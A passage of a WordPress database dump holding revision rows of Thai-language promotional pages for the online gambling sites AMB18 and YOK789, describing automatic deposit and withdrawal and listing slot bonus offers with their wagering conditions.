“เสถียร” ที่สุดในประเทศไทยในขณะนี้</b></em></p></blockquote>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2026-02-26 19:22:10','2026-02-26 19:22:10','',29,'https://amb18slot.com/?p=400',0,'revision','',0),(401,3,'2026-02-26 19:22:11','2026-02-26 19:22:11','<h1>AMB18 ฝากถอนออโต้ทันสมัย ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1> <p data-pm-slice=\"0 0 []\">เว็บพนัน <b>AMB18 </b>มาพร้อมระบบฝากถอนออโต้ที่ทันสมัย ออกแบบมาเพื่อความรวดเร็วและสะดวกสบายของผู้ใช้งาน ระบบทำงานอัตโนมัติเต็มรูปแบบ ตลอด 24 ชั่วโมงไม่ต้องรอแอดมินไม่ต้องเสียเวลา ทำรายการเสร็จภายในไม่กี่ขั้นตอน จุดเด่นคือไม่มีขั้นต่ำในการฝากถอนช่วยให้บริหารงบประมาณได้อย่างยืดหยุ่น เหมาะทั้งมือใหม่และผู้เล่นประจำ เพียงไม่กี่วินาที เงินก็สามารถเข้าบัญชีได้อย่างรวดเร็วระบบมีความเสถียร ปลอดภัยและรองรับหลายธนาคารชั้นนำในประเทศไทย ตอบโจทย์ผู้ที่ต้องการความไว ความคุ้มค่าและความสะดวกสบาย อย่างไรก็ตามควรใช้บริการอย่างมีสติ และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้นเพื่อการใช้งานอย่างรับผิดชอบ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18.webp\" alt=\"ฝากถอนออโต้\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ทำไมระบบฝากถอนออโต้ของเว็บคาสิโนออนไลน์ AMB18 ถึงเร็วกว่าเว็บอื่น</h2> <p data-start=\"2289\" data-end=\"2531\">สิ่งที่ทำให้ <b>AMB18 </b>โดดเด่นเหนือเว็บอื่น คือการใช้เทคโนโลยี <strong data-start=\"2353\" data-end=\"2380\">Auto Transaction System</strong> ที่เชื่อมต่อโดยตรงกับธนาคารและผู้ให้บริการวอเลทในประเทศไทย ซึ่งระบบนี้ถูกนำเข้าจาก USA และได้รับการปรับแต่งให้เหมาะกับการใช้งานของผู้เล่นไทยโดยเฉพาะ</p><p data-start=\"2533\" data-end=\"2575\"><strong>จุดเด่นของระบบฝากถอนออโต้ </strong><b><u>AMB18</u></b></p><ul><li data-start=\"2578\" data-end=\"2668\"><strong data-start=\"2578\" data-end=\"2617\">เชื่อมต่อโดยตรงกับธนาคารหลักทุกแห่ง</strong> เช่น กสิกรไทย, กรุงเทพ, ไทยพาณิชย์, กรุงศรีฯ ฯลฯ</li><li data-start=\"2671\" data-end=\"2753\"><strong data-start=\"2671\" data-end=\"2707\">รองรับ TrueMoney Wallet เต็มระบบ</strong> เหมาะสำหรับผู้เล่นที่ไม่สะดวกใช้บัญชีธนาคาร</li><li data-start=\"2756\" data-end=\"2796\"><strong data-start=\"2756\" data-end=\"2794\">ตรวจจับยอดฝากทันทีด้วย AI อัจฉริยะ</strong></li><li data-start=\"2799\" data-end=\"2866\"><strong data-start=\"2799\" data-end=\"2840\">ระบบความปลอดภัยสูงสุดแบบ 2 ชั้น (2FA)</strong> ป้องกันการโจรกรรมข้อมูล</li><li data-start=\"2869\" data-end=\"2919\"><strong data-start=\"2869\" data-end=\"2903\">ใช้เวลาเพียง 5 วินาทีต่อรายการ</strong> ทั้งฝากและถอน</li></ul><blockquote><p style=\"text-align: center;\" data-start=\"2921\" data-end=\"3018\"><em><b>ด้วยระบบนี้ AMB18 จึงกลายเป็นเว็บพนันที่ทั้ง “เร็ว” และ “เสถียร” ที่สุดในประเทศไทยในขณะนี้</b></em></p></blockquote>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2026-02-26 19:22:11','2026-02-26 19:22:11','',29,'https://amb18slot.com/?p=401',0,'revision','',0),(402,3,'2026-02-26 19:22:11','2026-02-26 19:22:11','<h1>AMB18 ฝากถอนออโต้ทันสมัย ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1> <p data-pm-slice=\"0 0 []\">เว็บพนัน AMB18 จัดเต็มด้วยระบบฝากถอนออโต้สุดล้ำดีไซน์มาเพื่อสายเล่นที่ต้องการความไวแบบไม่สะดุด ทุกขั้นตอนทำงานอัตโนมัติ 24 ชั่วโมงเต็ม ไม่ต้องทักแอดมินไม่ต้องรอให้เสียจังหวะทำรายการแค่ไม่กี่คลิกก็เรียบร้อย จุดขายที่หลายคนเลิฟคือไม่มีขั้นต่ำในการฝากถอนจะเติมน้อยเติมหนักก็จัดการงบได้ตามสไตล์ตัวเอง ตอบโจทย์ทั้งมือใหม่ที่เพิ่งลองสนาม และสายโปรที่เล่นประจำแค่ไม่กี่วินาทีเงินก็วิ่งเข้าบัญชีแบบทันใจ ระบบเสถียร ลื่นไหล และมีความปลอดภัยสูง รองรับหลายธนาคารชั้นนำในไทย ใช้งานง่ายไม่ซับซ้อน เหมาะกับคนที่อยากได้ทั้งความเร็ว ความคุ้ม และความสะดวกในที่เดียว อย่างไรก็ตาม ควรใช้งานอย่างมีสติ วางแผนการเล่นให้ดี และเปิดให้บริการเฉพาะผู้ที่มีอายุ 18 ปีขึ้นไป เพื่อการใช้งานอย่างรับผิดชอบ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18.webp\" alt=\"ฝากถอนออโต้\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ทำไมระบบฝากถอนออโต้ของเว็บคาสิโนออนไลน์ AMB18 ถึงเร็วกว่าเว็บอื่น</h2> <p data-start=\"2289\" data-end=\"2531\">สิ่งที่ทำให้ <b>AMB18 </b>โดดเด่นเหนือเว็บอื่น คือการใช้เทคโนโลยี <strong data-start=\"2353\" data-end=\"2380\">Auto Transaction System</strong> ที่เชื่อมต่อโดยตรงกับธนาคารและผู้ให้บริการวอเลทในประเทศไทย ซึ่งระบบนี้ถูกนำเข้าจาก USA และได้รับการปรับแต่งให้เหมาะกับการใช้งานของผู้เล่นไทยโดยเฉพาะ</p><p data-start=\"2533\" data-end=\"2575\"><strong>จุดเด่นของระบบฝากถอนออโต้ </strong><b><u>AMB18</u></b></p><ul><li data-start=\"2578\" data-end=\"2668\"><strong data-start=\"2578\" data-end=\"2617\">เชื่อมต่อโดยตรงกับธนาคารหลักทุกแห่ง</strong> เช่น กสิกรไทย, กรุงเทพ, ไทยพาณิชย์, กรุงศรีฯ ฯลฯ</li><li data-start=\"2671\" data-end=\"2753\"><strong data-start=\"2671\" data-end=\"2707\">รองรับ TrueMoney Wallet เต็มระบบ</strong> เหมาะสำหรับผู้เล่นที่ไม่สะดวกใช้บัญชีธนาคาร</li><li data-start=\"2756\" data-end=\"2796\"><strong data-start=\"2756\" data-end=\"2794\">ตรวจจับยอดฝากทันทีด้วย AI อัจฉริยะ</strong></li><li data-start=\"2799\" data-end=\"2866\"><strong data-start=\"2799\" data-end=\"2840\">ระบบความปลอดภัยสูงสุดแบบ 2 ชั้น (2FA)</strong> ป้องกันการโจรกรรมข้อมูล</li><li data-start=\"2869\" data-end=\"2919\"><strong data-start=\"2869\" data-end=\"2903\">ใช้เวลาเพียง 5 วินาทีต่อรายการ</strong> ทั้งฝากและถอน</li></ul><blockquote><p style=\"text-align: center;\" data-start=\"2921\" data-end=\"3018\"><em><b>ด้วยระบบนี้ AMB18 จึงกลายเป็นเว็บพนันที่ทั้ง “เร็ว” และ “เสถียร” ที่สุดในประเทศไทยในขณะนี้</b></em></p></blockquote>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2026-02-26 19:22:11','2026-02-26 19:22:11','',29,'https://amb18slot.com/?p=402',0,'revision','',0),(403,3,'2026-02-26 19:24:49','2026-02-26 19:24:49','<h1>โปรโมชั่น YOK789 รวมโปรสล็อต สมัครรับโบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-pm-slice=\"0 0 []\">โปรโมชั่นสุดคุ้มจาก YOK789 เอาใจสายสล็อตโดยเฉพาะ กับโปรสมัครใหม่รับโบนัสฟรี 100% เพิ่มโอกาสสนุกได้มากขึ้นตั้งแต่เริ่มต้น ไม่ต้องฝากเยอะก็ร่วมลุ้นได้ พร้อมเงื่อนไขถอนไม่อั้น รองรับทั้งสมาชิกใหม่และสมาชิกปัจจุบัน รวมโปรสล็อตหลากหลายรูปแบบ ไม่ว่าจะเป็นโบนัสฝากแรก โบนัสฝากประจำ โปรโมชั่นคืนยอดเสีย และกิจกรรมพิเศษตามเทศกาล อัปเดตใหม่ตลอดเวลา ช่วยเพิ่มความคุ้มค่าในการเล่นมากยิ่งขึ้น ระบบฝากถอนอัตโนมัติ รวดเร็ว ปลอดภัย รองรับธนาคารชั้นนำ เหมาะสำหรับผู้ที่ต้องการความตื่นเต้นและความบันเทิงในรูปแบบออนไลน์ อย่างไรก็ตาม ควรเล่นอย่างมีสติ วางแผนการเงินทุกครั้ง และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อการเล่นอย่างรับผิดชอบและปลอดภัย</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp\" alt=\"20 get 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp\" alt=\"79 get 200\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp\" alt=\"Bonus free 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp\" alt=\"HBD Bonus\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp\" alt=\"Reward 10\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp\" alt=\"lucky wheel\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ <b>YOK789</b></strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\"><strong data-start=\"2414\" data-end=\"2445\"><b>YOK789</b> ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2026-02-26 19:24:49','2026-02-26 19:24:49','',27,'https://amb18slot.com/?p=403',0,'revision','',0),(404,3,'2026-02-26 19:24:50','2026-02-26 19:24:50','<h1>โปรโมชั่น YOK789 รวมโปรสล็อต สมัครรับโบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-pm-slice=\"0 0 []\">โปรโมชั่นสุดคุ้มจาก YOK789 เอาใจสายสล็อตโดยเฉพาะ กับโปรสมัครใหม่รับโบนัสฟรี 100% เพิ่มโอกาสสนุกได้มากขึ้นตั้งแต่เริ่มต้น ไม่ต้องฝากเยอะก็ร่วมลุ้นได้ พร้อมเงื่อนไขถอนไม่อั้น รองรับทั้งสมาชิกใหม่และสมาชิกปัจจุบัน รวมโปรสล็อตหลากหลายรูปแบบ ไม่ว่าจะเป็นโบนัสฝากแรก โบนัสฝากประจำ โปรโมชั่นคืนยอดเสีย และกิจกรรมพิเศษตามเทศกาล อัปเดตใหม่ตลอดเวลา ช่วยเพิ่มความคุ้มค่าในการเล่นมากยิ่งขึ้น ระบบฝากถอนอัตโนมัติ รวดเร็ว ปลอดภัย รองรับธนาคารชั้นนำ เหมาะสำหรับผู้ที่ต้องการความตื่นเต้นและความบันเทิงในรูปแบบออนไลน์ อย่างไรก็ตาม ควรเล่นอย่างมีสติ วางแผนการเงินทุกครั้ง และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อการเล่นอย่างรับผิดชอบและปลอดภัย</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp\" alt=\"20 get 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 